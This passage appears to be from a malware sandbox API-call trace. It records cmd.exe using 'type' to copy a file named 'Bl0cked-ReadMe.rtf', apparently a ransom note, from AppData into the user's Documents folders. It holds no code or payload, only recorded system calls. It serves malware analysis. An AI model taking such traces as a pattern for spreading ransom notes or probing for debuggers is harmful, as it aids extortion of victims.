Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.416] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.417] GetConsoleTitleW (in: lpConsoleTitle=0x4808e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.417] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.417] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.417] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.417] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.418] _wcsicmp (_String1="type", _String2=")") returned 75 [0140.418] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0140.418] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0140.418] _wcsicmp (_String1="IF", _String2="type") returned -11 [0140.418] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0140.418] _wcsicmp (_String1="REM", _String2="type") returned -2 [0140.418] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.423] GetFileType (hFile=0x7) returned 0x2 [0140.930] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.930] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2efac8 | out: lpMode=0x2efac8) returned 1 [0140.930] _dup (_FileHandle=1) returned 3 [0140.930] _close (_FileHandle=1) returned 0 [0140.930] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0140.930] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2efa98, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0140.931] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0140.931] GetConsoleTitleW (in: lpConsoleTitle=0x2ef8c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.932] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0140.932] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0140.932] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0140.932] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0140.932] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.933] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2ef42c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef42c) returned 0x480e78 [0140.933] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0140.933] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0140.933] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0140.933] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ee338, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0140.933] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0140.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.933] GetFileType (hFile=0x54) returned 0x1 [0140.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.933] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ee390 | out: lpFileSizeHigh=0x2ee390*=0x0) returned 0x1632 [0140.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.933] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.933] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.933] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.933] GetFileType (hFile=0x4c) returned 0x1 [0140.933] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.933] GetFileType (hFile=0x4c) returned 0x1 [0140.934] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.934] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.935] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.935] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.935] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] GetFileType (hFile=0x4c) returned 0x1 [0140.936] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.936] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.937] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] GetFileType (hFile=0x4c) returned 0x1 [0140.937] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.937] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.938] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.938] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] GetFileType (hFile=0x4c) returned 0x1 [0140.938] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.938] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.939] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.939] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.939] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef3a8*, lpNumberOfBytesWritten=0x2ee3ac*=0x20, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee398 | out: lpNewFilePointer=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.940] ReadFile (in: hFile=0x54, lpBuffer=0x2ef1c8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee3b8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesRead=0x2ee3b8*=0x200, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef218*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef218*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef268*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef268*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef2b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef2b8*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] GetFileType (hFile=0x4c) returned 0x1 [0140.940] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.940] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef308*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] GetFileType (hFile=0x4c) returned 0x1 [0140.941] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.941] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee3ac, lpOverlapped=0x0 | out: lpBuffer=0x2ef358*, lpNumberOfBytesWritten=0x2ee3ac*=0x50, lpOverlapped=0x0) returned 1 [0140.941] 